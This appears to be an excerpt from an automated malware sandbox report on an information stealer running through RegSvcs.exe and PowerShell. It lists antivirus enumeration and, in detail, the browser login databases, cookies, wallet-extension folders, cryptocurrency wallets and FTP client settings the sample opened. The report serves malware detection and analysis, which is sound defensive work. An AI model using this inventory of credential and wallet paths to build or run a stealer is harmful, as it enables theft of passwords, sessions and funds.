      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
      Source: RegSvcs.exe, 00000003.00000002.1520290770.00000000011F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
      Source: RegSvcs.exe, 00000003.00000002.1520290770.00000000011F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3m
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
      Source: powershell.exe, 00000000.00000002.1918060411.00007FFAAC650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
